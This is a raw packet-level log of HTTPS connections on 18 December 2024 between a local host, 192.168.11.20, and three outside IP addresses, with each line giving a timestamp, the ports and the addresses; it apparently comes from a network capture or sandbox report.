                                                    Dec 18, 2024 11:20:11.585905075 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.585992098 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.586044073 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.586304903 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.586306095 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.586657047 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.586879015 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.587390900 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.587644100 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.588304996 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.588552952 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.589106083 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.589291096 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.589359999 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.589410067 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.589660883 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.590188026 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.590425014 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.590477943 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.590769053 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.590851068 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.591115952 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.591639996 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.591787100 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.591873884 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.591914892 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.592150927 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.592150927 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.592863083 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.593113899 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.593147039 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.593494892 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.594994068 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.595073938 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.595232010 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.595232010 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.595277071 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.595302105 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.595542908 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.596529007 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.596781969 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.599033117 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.599112034 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.599313021 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.599344969 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.599370003 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.599567890 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.601548910 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.601627111 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.601768970 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.601768970 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.601804018 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.601865053 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.601865053 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.602013111 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604589939 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.604669094 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.604836941 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604836941 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604885101 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604886055 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604886055 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.604914904 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.605103016 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.606878042 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.606956959 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.607119083 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.607119083 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.607177973 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.607302904 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.607302904 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.607443094 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609311104 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.609388113 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.609492064 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609705925 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609707117 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609707117 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609707117 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.609781981 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.610061884 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.610074043 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.610130072 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.610321999 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.610373974 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.610408068 CET44349729104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:20:11.610532045 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:11.610738039 CET49729443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:20:19.491466999 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:19.491547108 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:19.491755962 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:19.493558884 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:19.493619919 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:20.316694021 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:20.317656040 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:20.317713976 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.428503036 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.428545952 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.428788900 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.428809881 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.471824884 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.833498001 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.833503008 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.833662987 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.833714008 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.833723068 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.833771944 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.833915949 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.833915949 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.833924055 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.833965063 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.834059000 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.834224939 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.834224939 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.834233999 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:22.834269047 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:22.877940893 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.238389969 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.238408089 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.238607883 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.238607883 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.238681078 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.238709927 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.238826990 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.238993883 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239048004 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239103079 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239147902 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239161015 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239367962 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239367962 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239438057 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239491940 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239718914 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239723921 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239758015 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.239934921 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.239998102 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.240056038 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.240107059 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.240187883 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.240247011 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.240263939 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.240418911 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.645376921 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.645642042 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.645642042 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.645642042 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.645705938 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.645848036 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.646050930 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.646050930 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.646117926 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.646353960 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.646644115 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.646694899 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.646815062 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647023916 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647077084 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647094011 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647231102 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647408009 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647408009 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647463083 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647572994 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647655964 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647836924 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647836924 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.647891998 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.647926092 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.648121119 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.648340940 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.648370028 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.648513079 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.648789883 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:23.648840904 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:23.690418959 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.053852081 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.053858995 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054009914 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054011106 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054049015 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054105997 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054112911 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054203033 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054203033 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054239988 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054301977 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054308891 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054383993 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054383993 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054483891 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054529905 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054670095 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054670095 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054743052 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054766893 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054876089 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054877996 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054877996 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054886103 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.054997921 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.054997921 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055006027 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.055085897 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.055092096 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055154085 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055159092 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.055228949 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055239916 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.055299044 CET44349730129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:24.055334091 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055382013 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055429935 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:24.055596113 CET49730443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:31.869551897 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:31.869590044 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:31.869813919 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:31.869899035 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:31.869916916 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:32.644088030 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:32.644401073 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:32.645288944 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:32.645337105 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:32.646368980 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:32.647304058 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:32.647450924 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.463388920 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.463417053 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.463570118 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.463588953 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.463713884 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.516051054 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.844230890 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844240904 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844403028 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.844563007 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844573021 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844595909 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.844738007 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844773054 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.844908953 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.844942093 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.845091105 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:34.845118999 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:34.891019106 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.225234032 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.225253105 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.225569010 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.225616932 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.225665092 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.225677967 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.225893974 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.225941896 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226063967 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226075888 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226264954 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.226306915 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.226310015 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226454973 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226674080 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.226706028 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226738930 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226958990 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.226958036 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.227005005 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.227196932 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.227217913 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.227305889 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.227607012 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.227652073 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.281537056 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.582803965 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.582823038 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.582990885 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.582998991 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.583133936 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.583188057 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.606303930 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.606539011 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.606590986 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.606730938 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.606781960 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.606817961 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.606919050 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.606965065 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.606990099 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.607192039 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.608671904 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.608833075 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.608967066 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.609003067 CET44349731172.105.162.7192.168.11.20
                                                    Dec 18, 2024 11:20:35.609117031 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:35.609355927 CET49731443192.168.11.20172.105.162.7
                                                    Dec 18, 2024 11:20:44.318339109 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:44.318401098 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:44.318665981 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:44.318790913 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:44.318818092 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:45.141407013 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:45.142570972 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:45.142591000 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.365302086 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.365355968 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.365592957 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.365592957 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.365644932 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.419600964 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772448063 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772454023 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772615910 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772615910 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772663116 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772663116 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772671938 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772778034 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772810936 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772810936 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772891998 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.772913933 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.772922993 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.773046970 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.773123026 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.773123026 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:47.773130894 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:47.825695992 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.179600954 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.179611921 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.179809093 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.179858923 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.179961920 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.179979086 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.179992914 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.179999113 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.180015087 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.180135012 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.180135965 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.180135965 CET49732443192.168.11.20129.232.136.170
                                                    Dec 18, 2024 11:20:48.180143118 CET44349732129.232.136.170192.168.11.20
                                                    Dec 18, 2024 11:20:48.180241108 CET49732443192.168.11.20129.232.136.170
